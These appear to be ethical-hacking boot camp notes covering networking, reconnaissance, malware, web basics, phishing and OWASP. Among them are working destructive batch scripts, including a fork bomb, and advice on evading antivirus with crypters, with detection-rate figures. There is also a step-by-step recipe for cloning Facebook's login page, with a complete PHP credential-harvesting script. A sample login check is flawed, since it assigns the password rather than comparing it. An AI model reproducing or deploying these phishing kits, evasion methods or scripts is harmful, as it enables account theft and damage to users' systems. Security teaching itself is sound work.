Untitled

Boot Camp Day 1
===============
Session 1
=========
Introduction to Information Security
------------------------------------
Information
-----------
	Collection of data is known as Information. Information makes a complete meaning.

Data
----
	It is raw facts and figures. Data can be anything.
									Text
									Number
									Image
									Audio
									Video
	Data itself, a single piece of data never makes a sense.

Security
--------
	To protect and secure from leakage and breaches.

Information
===========
	Personal Information
	Sensitive Information
	Financial Information
	Economical Information
	Banking Information

Hackers
=======
	The person who have the highest amount of knowledge in the field of computer and technology.
		How a system is working.
		How processes are working.
		How my new technologies are working.
		Client side and server side process.

Hacking
=======
	Gaining someine's data with or without their authorisation. Legally or illegally.

Types of Hackers
================
1. White Hat Hacker
	They are good people, who work for the welfare of the organisation. They work for the security only.
		Rahul Tyagi
		Abhijeet Singh
		Sanjeev Multani
2. Black Hat Hacker
	They are really bad people, which brings chaos and destruction to the cyber society. They have only one thing in mind.... Money.
		Mitinik
		New Lizard Suqad
3. Grey Hat Hacker
	They are the combination of both. They hack into the stuff and uncurtain the dirty things. They have only one focus ---> Welfare of the society and the people.
		Anonymous
		The Legions
		Hacktivism
		Julian Assange --> The Wikileaks
		Edward Snoden

Script Kidies
-------------
	Copy + Paste --> Who just uses the codes and techniques that are created by others without knowning how things are working.
N00bz
-----
	They are new babies who are trying to learn something new in the world of cyber.
Crackers
--------
	They are not the hackers but they are very very good at cracking the passwords. File passwords, Folder password, OS password, Email password.

Why Do People Hack?
-------------------
	Security
	Money
	Revenge
	Curiosity|knowledge
	Fame
		Zoo Zoo Hacker
		Rafi Hacker

Cyber Crimes And Laws
=====================
IT Act 2000 and IT Act 2008
28 Types of cyber crime, but all of them are categorised into these few group:
	--> Hacking
	--> Identity Theft
	--> Insult, Online Defamation
	--> Harrasament
	--> Cyber Terrorism

Section 43:
	Penalty and compensation for damage to computer and computer system
Section 65:
	Tampering with Computer Source Documents
Section 66:
	Computer Related Offences
Section 67:
	Punishment for publishing or transmitting obsence material in electronic form
Section 71:
	Penalty For Misrepresentation
Section 72:
	Breach of confidentiality and privacy
Section 73:
	Penalty for publishing electronic signature certificate false in certain particular | Signature Forgery

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 2
=========

Network Terminology I
---------------------

Network
=======
	Connection of two or more IT Electronic Devices, with a sole purpose of Information Interchange.

Topology
========
	How my devices are connected to each other in the network. Physical layout of the network.

1. Star Topology
================
	When all of my end devices are connected to a central connecting device.
	If my central device is down, then communication is not possible.
2. Ring Topology
================
	When all of my end devices are connected in a closed circular chain.
		There are two ways of communication in Ring Topology
		1. Unidirectional
			Either clock or anti clock
		2. Bidirectional
			Data can go through any direction
3. Mesh Topology
================
	When all of my devices are connected to every device in the network.
4. Bus Topology
===============
	When all the end devices are connected to a central communicating line, which is known as Back Bone.
5. Hybrid Topology
==================
	When two or more type of topologies are connected in the network.

Protocols
=========
	Set of rules and regulations, which are required by every device to follow, to commnunicate in the network.

1. IP --> Internet Protocol
2. TCP --> Transmission Control Protocol
3. UDP --> User Datagram Protocol
4. FTP --> File Transfer Protocol
5. HTTP --> Hyper Text Transfer Protocol
6. SMTP --> Simple Mail Transfer Protocol
7. VoIP --> Voice Over Internet Protocol
8. DHCP --> Dynamic Host Configuration Protocol

IP Address
==========
	Internet Protocol Address
	-------------------------
	It is a virtual address which is provided to a device, which is connected to a network or internet, just for communicating. It is unique in a network.

Version of IP Address
=====================
	1. IPv4
	2. IPv6

1. IPv4 --> Internet Protocol Version 4
----------------------------------------
	It is a 32 bit long address, divided into 4 octets and seperated by a period.

	192.168.0.28 ---> IPv4
	4 octets --> 192|168|0|28
		Because I can represent a number using 8 bits(0 and 1)
	Periods --> dot(.)


192 = 128+64 = 11000000
168 = 128+32+8 = 10101000
0  = 00000000
28 = 16 + 8 + 4 = 00011100


128		64		32		16		8		4		2		1
=========================================================
1		1		0		0		0		0		0		0	192
1		0		1		0		1		0		0		0	168
0		0		0		0		0		0		0		0	0
0		0		0		1		1		1		0		0	28


192.168.0.28 = 11000000.10101000.00000000.00011100
It is composed of decimal numbers only. --> 0-9
Total Number Of IP Address --> 2^32 IP Addresses
	0.0.0.0 - 255.255.255.255

Classes of IPv4 Addresses
=========================
1. Class A --> 0.0.0.0 - 127.255.255.255
2. Class B --> 128.0.0.0 - 191.255.255.255
3. Class C --> 192.0.0.0 - 223.255.255.255
4. Class D --> 224.0.0.0 - 239.255.255.255
5. Class E --> 240.0.0.0 - 255.255.255.255

Class D and Class E --> Military and research and development purpose.

2. IPv6 -> Internet Protocol Version 6
======================================
	It is 128 bit long address. It is composed of hexa decimal values. Last 32 bit of IPv6 addresses are taken from MAC Address.
	0000:0000:0000:0000:0000:0000:0000:0000
	FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
	Total number of IPv6 --> 2^128
		0000:fe80:0000:f68c:50ff:fe5f:9718
								   5f:97:18
		f4:8c:50:5f:97:18

Types of IP Address
===================
1. Public IP Address | Global IP Address
		IP Address which is provided by the ISP or that of ISP
		Google.com --> myipaddress --> 125.63.71.34
					   ipcow.com ----> 125.63.71.34
					   ipchicken.com > 125.63.71.34

	User-Agent Information
	======================
			Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
			Hostname = 125.63.71.34.reverse.spectranet.in
			Device = X11
			Operating System = Ubuntu
			Browser Name = Firefox
			Browser Version = 60.0
			Is Mobile Device = False
			Is Beta = False
			Screen Resolution = 1366 x 768

2. Private IP Address | Local IP Address
		This is the IP Address which is provided to end devices which are connected in the network, by the router.
			MS-OS --> cmd ---> ipconfig
			Linux/Unix --> Terminal --> ifconfig
				ifconfig --> interface Configuration

IP Subnetting
=============
	Division of IP Address into further sub network so that IP wastage is reduced.


NAT --> Network Address Translation
===================================
It is a service used just above the router so that my Private IP Address can be converted and mapped into Public IP Address and Public IP Address into Private IP Address.

https://drive.google.com/file/d/0B2xwT_-2wGTkSElEbjVxVzZXUlE1M2FXbjRHcGl1QkRqYlBR/view?usp=sharing

DHCP
====
Dynamic Host Configuration Protocol
-----------------------------------
	It is the protocol which works in the router. It is responsible for allocating an IP Address to the connected device in the network.

	IP-Pool
	=======
		It is collection of IP Address which can be provided to the devices.
	DHCP Server
	===========
		It is the server which provides IP Address to the devices from the IP Pool.

	DHCP allocates the IP Address on the basis of lease time period.

	MS-OS
	=====
	cmd ---> ipconfig /release
			 ipconfig /renew

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 3
=========
Network Terminology II
======================
Types Of Network
----------------
1. PAN --> Personal Area Network --> Bluetooth, ShareIt --> 1-10m
2. LAN --> Local Area Network --> WiFi, whole Campus --> 10m-5Km
3. MAN --> MetroP. Area Network --> Whole City --> 5km-50km
4. WAN --> Wide Area Network --> Internet -->

LAN --> Collection of PAN
MAN --> Collection of LAN
WAN --> Collection Of MAN

1. Intranet --> Intra -> Inside | Net -> Network
			Network Infrastructure which works inside a campus, cannot be accessed by people outside the campus
2. Internet --> Connection of two or more networks

Ports
=====
	Are specific gateways vai which a device can use or access the external service. There are two different types of ports:
		1. Physical Ports
		2. Virtual Ports

1. Physical Ports
=================
	These are the ports which we can see, touch and can take the services. Which are present in the device and are used for connecting some different hardwares.
		USB
		Audio Jack
		HDMI
		VGA
		Charging Port

2. Virtual Ports
================
	These are the ports via which i can use the network services. They are not tangible, but can use the services. External and specific services.
	There are 65,555+ virtual ports.
	They are also of three types:
	1. Well-Known | Pre-Defined Ports
	2. Registered Ports
	3. Dynamic Ports

	1. Well-Known | Pre-Defined Ports
	=================================
		These are the ports which are defined by internet community for running and hosting some specific services. The services over these ports cannot be changed.
			21 --> FTP
			22 --> SSH
			23 --> Telnet
			80 --> HTTP
			443 --> HTTPS
		These services can also run on other ports, but on these ports only these service will run.
		Ports under 1-1024 are categorised under this kind of port.

	2. Registered Ports
	===================
		These are the ports which are registered by certain organisations for running their specific services.
		Orcale ----> Database ---> MySQL --> 3306
		Apple -----> iPhone -----> iTunes -> 3689
		Black Berry Enterprise ---> server > 3101

	3. Dynamic Ports
	================
		These are the ports which are neither Pre-Defined nor registered ports, and can be used by any computer user locally for their own purpose.
			1337 --> LEET port | Hacker's Port

Our computer is a dumb device. We humans can remember the names very easily but computer can only understand a language, that is of numbers. So for computers it is easy to remember the number as compared to the name.

DNS
===
Domain Name System|service
==========================
	This service is used to map IP address to domain name and helps in fetching the response of the specified request.
		www.google.com ----> Open front end of google
		172.217.161.4 -----> Open front end of google

		www.google.co.in --> 172.217.24.227
www.google.co.in
	in --> indian domain
		co --> company domain inside india
			google ----> domain whose name is google
				root ---> www|mail|drive|calander

Proxy
=====
	These are the dummy servers, which are used for hiding and masking my IP Address. Public IP Address.
		kproxy.com

		ipcow.com ---> 125.63.71.34 ---> Original IP Address (Public)
		kproxy.com --> ipcow.com ---> 192.95.12.100 -> Proxy wala IP Address

VPN --> Virtual Private Network
===============================
	They just work like proxy servers but they are much more advance then the proxy servers in the following ways:
		1. They are used to maintain the anonymity, hiding and masking IP Address
		2. They provide the encryption of data.
		3. They provide the tunneling.
			Secret Passage
			Connecting to the internal network of an organisation

Services
========
	1. Online Based Service ----> kproxy.com
	2. Extension Based Service -> anonymox
	3. Standalone Service ------> Proper softwares or hardwares which provide us these services.
		psiphon3
		UltraSurf
		Proxpn
		HotSpot Shield
		openVPN

OSI Model
=========
Open System Interconnection Model
---------------------------------
It is a model which was used for communication in the network. But due to some obvious reasons, this model was made an ideal model. This model is not used at all.
OSI is 7 layer approach model
1. Physical Layer
		Responsible for physical connection and conversion of data into 0s and 1s.
2. Data Link Layer
		Responsible for node to node delivery. It is also responsible for physical addressing (MAC address)
3. Network Layer
		It provides the packet, IP Address - Source and destination IP Address.
		It also decides the route.
4. Transport Layer
		It is responsible for the delivery of the message.
5. Session Layer
		It is responsible for the connection establishment, connection authentication and connection termination.
6. Presentation Layer
		It is responsible for data compression, encryption and decryption of data.
7. Application Layer
		It tells that which application to use for a specific data.

TCP\IP Model
============
	It is 4 layer based model. Which is similar to OSI model. Layers are again independent of each other but it's working is very very fast as compare to that of OSI model.

Web Technology Basics
=====================
1. Domain Name
2. Hosting Space
3. Server
4. DataBase
5. Technology
	Client Side
	Server Side

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 4
=========
Information Gathering and Digital Footprinting
==============================================
Phases of hacking
-----------------
	These phases are must to follow in order to perform any kind of hacking.
	1. Information Gathering
	2. Scanning
	3. Gaining Access
	4. Maintaining Access
	5. Covering Traces

Information Gathering
---------------------
	To collect as much Information as possible about the target.


				Information Gathering
				---------------------
							|
			-------------------------
			|						|
	Target specific 			Network Specific
			|							|
	-----------------			-----------------
	|				|			| 				|
Web Site 		Human as 	Basic Info. 	Advance Info.
as Target 		target 		Gathering 		Gathering


Information Gathering is divided into further
		1. Network Specific
		2. Target Specific

1. Network Specific
===================
	To collect the information about the network
			Number Of people Connected
			IP Address allocated to the connected devices
			MAC Address
			Name Of the Vendor
			If possible --> Access of the shared folder
		1. Advanced IP Scanner
		2. Angry IP Scanner
		3. Soft Perfect Network Scanner
				https://www.softperfect.com/products/networkscanner/

		NMAP --> Network Mapping tool

2. Target Specific
==================
	i. Web site or web application
	ii. Human Specific

Web site or web Application
===========================
	IP Address
		Ping
			> 65.52.169.46
	Server Information
		Dedicated or shared
		https://www.yougetsignal.com
	Database Information
	MX and NX Records
	Name of the registrar
	Technologies
	White list and Black List
			|--> robots.txt

		https://whois.net/
		https://www.yougetsignal.com
		https://whois.icann.org/en
		https://mxtoolbox.com/
		wapalyzer --> extension --> helps me in gathering information about the technologies used behind a web site or web application.
		Online Nmap
			https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap


Human Specific
==============
	Social Network
	Social Networking Websites
		Linkedin
		Twitter
		Facebook
	Dating Websites
	Matrimonial Websites
	Job Portals
	Fake Surveys
	Spy Services

				ravisraaman.marines

Tools
=====
	Maltego
		It is corporate level information gathering tool. It helps in gathering information about each and every aspect.
		Community Edition ---> Free
			All transformations does not work in free edition.
		https://www.paterva.com/web7/downloads.php

OS Login Bypass
===============
When you log into the OS, then while starting the windows, you will be asked for password.
1. Online Method
2. Offline Method

1. Online Method
================
	When you need to crack or bypass the password, change the OS login password when the system is up, and you do not know the current password. It only works in windows ultimate or professional version.
	1. Right click on "My Computers"
	2. Click on "Manage"
	3. Click on "Local Users and Groups", in the left pane
	4. Click on "Users"
	5. Choose the user, for whom you want to change the password.
	6. Right Click
	7. Set Password

2. Offline Method
=================
	This is the condition, when the device is in shut down mode and we cannot open the group editing policies.
	SAM --> Security Account Manager
	C:\Windows\System32\Config\SAM
		Hiren Boot CD
		Kon Boot CD
	These are live bootable OS. We use tools like Rufus, to make the media bootable.
	BIOS --> Basic Input Output System
	Live OS ---> It replaces the BIOS of the Computer or the device from the one which is in the bootable media.

https://ufile.io/9yr2t
k

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 5
=========
Malware Illustration
--------------------
Malware --> MAL + WARE
MAL -> MALicious
WARE -> softWARE

Malware are malicious softwares which can cause harm to the system. These can be anything, tools, applications, softwares, file.
Types Of Malware:
	1. Virus
	2. Worms
	3. Trojan
	4. Keyloggers
	5. Spywares
	6. Ransomware
	7. Botnet
	8. Rootkits
	9. Adwares

1. VIRUS
========
	Vital Information Resource Under Seize
	Virus can be an application, tool, software, which can harm the system and system files of the device.
	Symptoms of virus
		Slow
		Slow Processing
		Delete
		Attribute change
		Extension Change
		Shortcut keys|Files
	It will remain dormant, until a user executes it. Virus needs human assistance for executing itself.

Batch File Virus
================
1. Infinite Folder
------------------
	:loop
	mkdir %random%
	goto loop

2. Cascading folder and file
----------------------------
	:rudra
	mkdir rudr
	echo Hello Boys... Me acha hu...!! >>rudr.txt
	cd rudr
	goto rudra

3. Space Eating Virus
---------------------
	echo hello>>file.txt
	:loop
	type file.txt>>file.txt
	goto loop

4. Process Calling
------------------
	:loop
	start cmd.exe /c
	goto loop

5. Fork Bombing
---------------
	%0|%0


Polymorphic Virus
Logic Bomb
Boot Sector Virus
Browser Infectious Virus


https://lucideustech.blogspot.com/2018/04/mac-os-login-screen-bypass-with.html

aran.kuanr@gmail.com
aran.k.uanr@gmail.com
ara.n.k.u.anr@gmail.com
a.r.a.n.k.u.a.n.r@gmail.com


2. Keyloggers
=============
	These are the applications which are used to grab the key strokes of the devices. It is just like an extra layer, which takes the keys and dump them on the screen.
	1. Online Based| Remote --> iStealer
	2. Local Storage
		Family Key Logger
			http://www.spyarsenal.com/download.html
		BPK Keylogger
		Refog Keylogger
	Screenshoter --> when ever you press anything, key or mouse click, then your application will take a screenshot.
	Screen Recorder

3. Ransomware
=============
	It is when your system gets hijack and all the system files get encrypted by the attacker and you need to pay some ransom to the attacker for decrypting the files.
		WannaCry
		Pateya
		Bad Rabbit

4. Worms
========
	These are the malwares which spread by itself. It nees human assistance just for once. Common feature
					Replication
					Copy Itself
					Speard Through Pen drive or mail
					It is target specific
		Conficker worm --> 1,00,000 Devices

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 6
=========
5. Trojans
----------
	These are the malwares which helps an attacker to gain the remote access of the target device. Remote Access ---> Backdooring. I can have the access, can download any file, can upload anyfile. can use anything and can manipulate the data.
	There are two types of trojans:
		1. Forward Connection
		2. Reverse Connection

1. Forward Connection
---------------------
	When the attacker have the target's IP Address, then he can directly attack the system.
	1. Target keeps on moving --> IP Address of the target will keep on changing
	2. It will be very very hard for an attacker to get the target's IP Address everytime, when he will change the location.


2. Reverse Connection
---------------------
	The attacker do always have his own IP Address. then the attacker can craft an application which is embedded with his own IP Address. He will send the application to the target. As soon as the target will execute the application, the attacker will receive a reverse remote connection.

RAT --> Remote Administrative|Access Tools
	These are third party tools which are used for creating Trojans.
	Dark Comet

How Does Anti-Malware Works
===========================
	All of the Anti-Malware works on the basis of signature. If they have the signature of the trojan in the database, it means, that it is a malware else the file is clean.

How to evade Anti-Malware?
==========================
	If I can change the signature it means I can evade the Anti-Malware. We will change the signature of trojan, so that we can evade Anti-Malware.
	With the help of these tools we can change the signature of the trojan:
		1. Binders
		2. Cryptors
		3. Hex Editors --> Neo Hex Editor
		4. Obfusscators -> Red Gate Smart Assambely

Binder and cryptor
==================
	Chrome Cryptor
	URGE Cryptor

Raw --> 57/65
Raw + Chrome Cryptor --> 35/65
Raw + Chrome Cryptor + URGE Cryptor --> 29/60
Raw + Chrome Cryptor + URGE Cryptor + Red Gate Smart Assambely --> 12/65

Downlaod and install, you will get paytm cash back of 500/-
Downlaod and install the best antivirus
Download the facebook hacker --> hack any facebook account by this application
Download and install ---> will help you in securing your device 100% gauranteed
Scan the network with angry IP Scanner

6. Botnets
==========
	BOTNET = BOT + NET
		BOT = roBOT
		NET = NETwork
	It means that you are connected in the network, and are controlling many devices.
	The attacker deployed the trojan in n number of systems and devices and controlling it. That whole network of trojan is known as botnet.
		Ares Botnet
		https://github.com/sweetsoftware/Ares

7. Rootkits
===========
	Which are or can be planted in the root of the device. Administrator, Kernel.
	These are the malwares which attacks and effects the kernel level and hard to find and hard to remove.

System Protection From Malwares and Secure System Configuration
===============================================================
Security
--------
	1. Firewall Should always be enabled.
	2. Anti-Virus Should always be installed and updated.
	3. Windows patches and updates.
	4. Always use sandbox|Virtualised environment for analysing or running a suspicious application.
		Sandboxie --> Virtual and simulated environment for analysing
		Virtual Box Simulation
	5. EXE radar

Configuration
-------------
	1. attrib --> for checking the attribute
	2. services
	3. Activated services
	4. Startup Service
		msconfig ---> startup
	5. netstat
	6. netstat -b
		-b --> applications which are binded to the port
	7. netstat -ona
		all | ports | Numeric Form
	8. Firewall Rule

https://lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 7
=========
Introduction to web Architecture and Components
-----------------------------------------------

1. Domain Name
---------------
	godaddy.com
	hostgator.com
2. Hosting Space
----------------
	000webhost.com
3. Server
---------
	They are the applications or hardwares which are used to run other programs. server side programs. php script.
	It manages the request and response.
	When a user enters something in the url bar ---> a request is generated
	At the same time, when user receives the data -> a response is received
	Servers are again of 2 types:
	1. MS OS Based server
		IIS --> Internet Information Services
	2. Linux Based Servers
		Apache | Tomcat
4. Database
-----------
	It is known as the backbone. It stores the data of the web site or the web application. It stores the data in a tabular way.
	Database --> Tables --> Columns --> Rows (Data)
	Database is again of two type:
	1. MS OS --> MSSQL
	2. Linux --> MySQL
5. Web Technologies
-------------------
	These are the coding languages or scripting languages in which our web site or web application is build.
	They are also divided into 2 types
	1. Client Side | Front End Scripting Language
	2. Server Side | Back End Scripting Language

	1. Client Side Scripting
		These provides the UI to the web site or the web application. It is what a user sees on the web browser.
		These require just a browser to run.
		HTML
	2. Server Side Scripting
		These are what works on back end.  They require a server to run.
		PHP

	MS OS --> ASP.NET
	Linux --> PHP

MS OS --> IIS + MSSQL + ASP.NET ---> Money
Linux --> Apache|Tomcat + MySQL + php ---> Money

Local Hosting Server
====================
By using these third party application for free, you can launch and host the application or the web site on the LAN and can run the testing for the same. There is no money involved, I can test the application for free.

1. Windows Based Server --> WAMPP
		W --> Windows
		A --> Apache
		M --> MySQL
		P --> Perl
		P --> Php

2. Linux Based Server --> LAMPP
		L --> Linux
		A --> Apache
		M --> MySQL
		P --> Perl
		P --> Php

3. Cross Platform Based Server --> XAMPP
		X --> Cross Platform
		A --> Apache
		M --> MySQL
		P --> Perl
		P --> Php

After Installing XAMPP
======================
1. Apache
2. MySQL
	we need to start these two services.

How To Access XAMPP Server
--------------------------
There are 3 ways via which we can access the xampp server. Open the browser
1. localhost
2. 127.0.0.1
3. Hosted system's IP Address

Web Security Misconfigurations
------------------------------
1. If I do have a good firewall, I am secure.
2. If I do have a good IDS and IPS, I am secure.
3. If the web site of the web application is using HTTPS, I am secure.

HTML
====
Hyper Text Markup Language
--------------------------
Front end developing language. which requires a browser to run.

1. HTML --> Each and everything of the front end is written in this tag.
<html>
xxxxxx
xxxxxx
xxxxxx
</html>

2. Head --> Contains the meta data
		Links of styles, title, date etc etc
		<head>
		xxxxxx
		xxxxxx
		xxxxxx
		xxxxxx
		</head>

3. title --> to provide the title to the tab
	<title>Name_Of_The_Title</title>

4. Body --> Which contains the whole of the code of the web site and the web application. I works after the head is closed.
<body>
xxxxxx
xxxxxx
xxxxxx
</body>

5. Paragraph -->
	<p>.....
	........
	........
	........
	</p>

6. Break
	<br> --> It is single tag. It doesnot needed to close
7. Heading
	There are 6 types of heading tag
	h1
	h2
	h3
	h4
	h5
	h6
	as the number increases, the font size decreases.

8. anchor  --> to provide the hyper link to anything
<a href="#">............</a>

9. Image
<img src=""></img>

10. Form
<form action="Kis page p redirect krna hai after clicking submit button" method="GET|POST">
</form>

11. Input
	<input type="text|number|date|password" id="Unique ID" name="Name Of the Element">
12. iframe
	<iframe src="http://www.lucideus.com"></iframe>

==========
pagee.html
==========
<html>
<head>
<title>CII</title>
</head>
<body>
<p>
<h1>Grade 2<br>
=======</h1>
<h2>Session 1<br>
---------</h2>
<a href="http://www.lucideus.com"><h3>Introduction To Cryptography</a><br>
----------------------------</h3>
Cryptography --> Conversion of text into another form, which is readable but
not understandable.
<br>
Conversion of plain text into an encrypted text via an algorithm which uses a
key, after transmission, decryption of the encrypted text into the plain text
via same algorithm and the key.
<br>

Plain Text --> It is a normal Text, which is typed by the user. which is
readable and understandable to everyone.<br>
Cipher Text --> Encrypted text, which is the output of the encryption.<br>
Encryption --> Process of converting plain text into a Cipher text, it is
readable but not understandable<br>
Decryption --> Reverse of encryption, conversion of Cipher text into a plain
text<br>
Algorithm --> It is the code which is used to encrypt and decrypt the plain
text into cipher text and cipher text into plain text.<br>
Key --> it is a special function, encryption and decryption is possible just
due to this key. <br
</p>
<img src="naruto.jpg" height="700"></img>
<form action="mera.html" method="GET">
Username :<input type="text" id="uname"><br>
Password :<input type="password" id="pass"><br>
<input type="submit" id="but">
</form>
</body>
</html>

=========
mera.html
=========
<html>
<head>
<title>Second Page</title>
</head>
<body>
<p>
This is my second page</p>
<iframe
src="http://www.lucideus.com"></iframe><br>
<img src="goku.jpg" height="500"></img>
</body>
</html>

PHP Basics
==========
Server Side Scripting Language

<?php
xxxx
xxxx
xxxx
xxxx
?>

<?php ---> Start of PHP code
?>  ---> End of php code
echo "Hello Guys"
$var   --> var is name of variable
$hack  --> Hack is name of variable
		$ ---> used to declare a variable
$_POST
$_GET

=========
CALL.html
=========
<html>
<head>
<title>Calculator</title>
</head>
<body>
<form action="calc.php" method="post" attribute="post">
First Value : <input type="text" id="first" name="first"><br>
Second Value : <input type="text" id="second" name="second"><br>
<input type="radio" name="group1" id="add" value="add" checked="true">ADD<br>
<input type="radio" name="group1" id="subtract" value="subtract">SUBTRACT<br>
<button type="submit" id="answer" value="answer">Calculate</button>
</form>
</body>
</html>

========
calc.php
========
<html>
<head>
<title>Jawab</title>
</head>
<body>
<p>
The Answer is:
<?php
$first=$_POST['first'];
$second = $_POST['second'];
if($_POST['group1'] == 'add')
{
$ans=$first+$second;
echo $ans;
}
if($_POST['group1'] == 'subtract')
{
$ans=$first-$second;
echo $ans;
}
?>
</p>
</body>
</html>


don.html
=========
<html>
<head>
<title>Me Hu DON</title>
</head>
<body>
<h1>Hackers</h1>
<h2>Mr. Ravi Raman</h2>
<p>I am Naval Oficer.<br>
I am an executive Officer.<br>
I am 35 years old.<br>
I am communication specialist.<br>
</p>
<a href="https://en.wikipedia.org/wiki/Black_hat">
<h3>Mr. Madhu</h3>
</a>
<h4>Mr. Hothi</h4>
<img src="spidy.jpg" width="500"></img>
<h5>Mr. Devdas</h5>
<iframe src="http://www.lucideus.com"></iframe><br><br><br><br><br><br><br><br>
<form action="sec.php" method="POST">
Username :<input type="text" id="user" name="users"><br><br>
Password :<input type="password" id="pass" name="passes"><br><br>
<input type="submit" value="Login">
</form>


</body>
</html>

sec.php
=======
<html>
<head>
<title>SuperHero</title>
</head>
<body>
<h1>This Is My Fav. SuperHero</h1>
<img src="shakti.jpg">
<?php
$username=$_POST['users'];
$password=$_POST['passes'];
if($username == "admin")
{
echo "Welcome to password protected area admin";
if($password="passes")
{
echo "Welcome admin";
}
else
{
echo "Wrong password";
}
}
else
{
echo "Wrong username";
}
?>
</body>
</html>
-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 8
=========
Phishing
--------
	It is a technique in which an attacker creates and develop a fake page or a fake web site, which look completely authentic and genuine. but it is not. He deploys the same and make people to enter their credentials.
	1. Spear Phishing
	2. Vector Phishing | Credential Harvestor

1. Spear Phishing
-----------------
	Targeting a single or an individual or the crowd of people having common interest. Target Specific.
2. Credential Harvestor
-----------------------
	It is not target specific. Any kind of person can come and enter their credentials. I just need to collect the credentals of the crowd for my own purpose.

Create Facebook's Phishing Page
===============================
1. Open Your Browser
2. Goto www.facebook.com
3. Right Click on the login page ---> view page source
4. Select all ---> copy
5. Open notepad and paste the whole code
6. Scroll to the very top of the code.
7. Ctrl+F ---> action=
	action="https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110"
8. In the received parameter
	https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110
	Replace it with fish.php


fish.php
========
<?php
header ('Location: https://www.facebook.com');
$handle = fopen("coffee.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Understanding The Code
======================
<?php ---> start of the php code
header ('Location: https://www.facebook.com');
	when the working of the php code is done, then redirect the user to https://www.facebook.com
$handle = fopen("coffee.txt","a");
	$handle ---> Variable
	fopen --> to open a file
			It will open a file, coffee.txt
	When we open a file, I need to pass an attribute, which says in which mode the file should open. There are 3 major attributes
	1. Read --> r
		This attribute is used for just reading the content of the file.
	2. Write -> w
		This attribute is use to write the content in the file.
			1. If there is no file name which we passed, then it will create a new file with the same name.
			2. If there is a file with the name and there is data inside the file, it will delete all the data and start writing the new data from the beginning, Overwrite.
	3. Append-> a
		It is same like write, but it never deletes data but, it will start continue to write the data in the same file.
foreach($_POST as $variable => $value)
	It is for loop in php. It says jb tk mere pass data POST method se aa rha hai, tb tk ye loop chalta rahe.
	$variable => $value
	Phone or email => abc.cyb@gmail.com

fwrite($handle, $variable); --> 1
fwrite($handle, "="); ---> 2
fwrite($handle, $value); ---> 3
fwrite($handle, "\r\n"); --->4
	fwrite --> to write data into the file
	fwrite($handle, $variable);
		$handle ---> specify the file in which we want to write
		$variable --> data which is to be stores in the file

	1					2 	3
		email or phone = 	Store the value inputed by the user
		4 --->it will enter a new line and start from the begining of the next line
fclose($handle);
	It means to close the open file ---> coffee.txt
exit;
	To stop the execution of the code and redirect to the user to the site specified in header
?> --> close of php code

IDN Homographic Attack
======================
	There are many languages in the world. Among those language there are many characters which are similar to english characters.
	To human eye, those similar characters do not have anby difference but to computer they do have the difference of their ASCII Value.

а, с, е, о, р, х and у --> Russian
a, c, e, o, p, x and y --> English

deepika Padukone --> English
dеерikа раdukоnе --> Cyrallic + English

Case Study - Must Read
======================
https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html

Social Engineering
==================
	To bluf someone in order to take the sensitive data. It is hacking without coding, Human mind hacking. An attacker can reterive the data or can make others to do his dirty works.

Fake Mails
==========
Sending    ----> https://emkei.cz/
				https://getgophish.com/
				https://www.youtube.com/watch?v=knc6Iq-hNcw&t=114s
Receiving  ----> www.temp-mail.org

haveibeenpwned.com
https://howsecureismypassword.net/

Email Tracing and Tracking
==========================
Email headers
https://grabify.link/ --> Try it yourself
http://www.fuglekos.com/ip-grabber/index.html -->
http://whoreadme.com

Email Encryption
================
	End-to-end encryption.
	encipher.it

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 9
=========
Introduction to Vulnerability Assessment and Penetration Testing
----------------------------------------------------------------

VAPT --> Vulnerability Assessment and Penetration Testing
V --> Vulnerability
		Loopholes, week security, security misconfiguration. From where an attacker can intrude and compromise your system.
A --> Assessment
		To scan for the Vulnerability.
P --> Penetration
		To beach into the system using the above Vulnerability. To hack into or to compromise the system
T --> Testing
		To generate the  report and to pass down. To test the above Vulnerability and to create a report for the same.


VA --> Vulnerability Assessment
		To scan the web application and to report the Vulnerability
PT --> Penetration Testing
		To beach into the system and report about those Vulnerabilities.
VAPT --> Vulnerability Assessment and Penetration Testing

When we talk about web application VAPT
========================================
OWASP
=====
Open Web Application Security Project
-------------------------------------
	It is non-profit charitable organisation, which works towards the security of the web application. They gather the information from all around the globe. They gather the information through CTF initiative.
	They open challange the whole hacking community, to hack into the online system and capture the flag, in return, they will provide with the bounty. They gather the logs of the attacks which are performed in the CTF.
	After gathering the whole logs, they perform the analysis of these logs and categorise the attacks accordingly.
	They release a list of 10 attacks.
	OWASP TOP 10. --> top 10 attacks.

1. Injection
2. XSS --> Cross Site Scripting
3. CSRF --> Cross Site Request Forgery
4. IDOR --> Insecure Direct Object References
5. Sensitive Data Exposure
